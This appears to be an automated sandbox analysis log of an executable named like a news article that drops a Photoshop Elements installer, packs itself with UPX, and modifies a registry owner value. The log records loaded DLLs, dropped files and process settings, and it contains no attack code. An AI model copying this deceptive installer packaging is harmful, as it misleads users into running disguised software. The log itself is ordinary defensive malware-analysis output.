Source: C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmpSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmpSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmpSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmpSection loaded: appresolver.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmpSection loaded: bcp47langs.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmpSection loaded: slc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmpSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmpSection loaded: sppc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmpSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmpSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmpSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeSection loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeSection loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeSection loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeSection loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeSection loaded: msxml3.dll
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeSection loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeSection loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeSection loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeSection loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeSection loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeSection loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeSection loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeSection loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeSection loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeSection loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeSection loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeSection loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeSection loaded: explorerframe.dll
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeSection loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeSection loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeSection loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeSection loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeSection loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeSection loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeSection loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeSection loaded: atlthunk.dll
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeSection loaded: ieframe.dll
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeSection loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeSection loaded: netapi32.dll
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeSection loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeSection loaded: wkscli.dll
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeSection loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeSection loaded: dataexchange.dll
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeSection loaded: d3d11.dll
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeSection loaded: dcomp.dll
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeSection loaded: dxgi.dll
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeSection loaded: twinapi.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeSection loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeSection loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeSection loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeSection loaded: msiso.dll
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeSection loaded: sxs.dll
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeSection loaded: mshtml.dll
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeSection loaded: powrprof.dll
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeSection loaded: umpdc.dll
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeSection loaded: srpapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeSection loaded: jscript9.dll
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeSection loaded: msimtf.dll
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeSection loaded: resourcepolicyclient.dll
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeSection loaded: d2d1.dll
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeSection loaded: dwrite.dll
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeSection loaded: d3d10warp.dll
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeSection loaded: dxcore.dll
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeSection loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeSection loaded: mlang.dll
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeSection loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeSection loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeSection loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeSection loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeSection loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeSection loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeSection loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeSection loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeSection loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeSection loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeSection loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeSection loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeSection loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeSection loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeSection loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeSection loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeSection loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeSection loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeSection loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeSection loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeSection loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeSection loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeSection loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeSection loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeSection loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeSection loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeSection loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeSection loaded: windows.shell.servicehostbuilder.dll
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeSection loaded: policymanager.dll
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeSection loaded: msvcp110_win.dll
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeSection loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeSection loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeSection loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeSection loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeSection loaded: msxml3.dll
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeSection loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeSection loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeSection loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeSection loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeSection loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{5E5F29CE-E0A8-49D3-AF32-7A7BDC173478}\InProcServer32Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwnerJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmpWindow found: window name: TNewButtonJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\Chrome\Application\Dictionaries
Source: Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.exeStatic file information: File size 321527232 > 1048576
Source: Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: Google.Widevine.CDM.dll.pdb source: Google.Widevine.CDM.dll.17.dr
Source: Binary string: D:\Jenkins\workspace\ccd-hyperdrive\main\native\win32\build\msvs_win32_x86\Release\x86\sym\HDBootStrapper\HDBootStrapper\Set-up.pdb source: PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3743552926.00000000001D1000.00000040.00000001.01000000.00000008.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000001D1000.00000040.00000001.01000000.00000008.sdmp
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeCode function: 10_2_00B49970 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,10_2_00B49970
Source: Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.exeStatic PE information: section name: .didata
Source: Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp.0.drStatic PE information: section name: .didata
Source: Google.Widevine.CDM.dll.17.drStatic PE information: section name: .00cfg
Source: Google.Widevine.CDM.dll.17.drStatic PE information: section name: .gxfg
Source: Google.Widevine.CDM.dll.17.drStatic PE information: section name: .retplne
Source: Google.Widevine.CDM.dll.17.drStatic PE information: section name: .voltbl
Source: Google.Widevine.CDM.dll.17.drStatic PE information: section name: _RDATA
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeCode function: 10_2_00511654 push ecx; ret 10_2_00511667
Source: initial sampleStatic PE information: section name: UPX0
Source: initial sampleStatic PE information: section name: UPX1
Source: initial sampleStatic PE information: section name: UPX0
Source: initial sampleStatic PE information: section name: UPX1
Source: C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmpFile created: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmpFile created: C:\Users\user\AppData\Local\Temp\PhotoshopElements_2024_LS30_win64.exeJump to dropped file
Source: C:\Users\user\Desktop\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.exeFile created: C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmpFile created: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping8016_1807591881\Google.Widevine.CDM.dllJump to dropped file
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping8016_1807591881\Google.Widevine.CDM.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeFile created: C:\Users\user~1\AppData\Local\Temp\CreativeCloud\ACC\AdobeDownload\HDInstaller.log
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping8016_767797103\LICENSE.txt
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT
Source: C:\Users\user\Desktop\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeProcess information set: NOOPENFILEERRORBOX
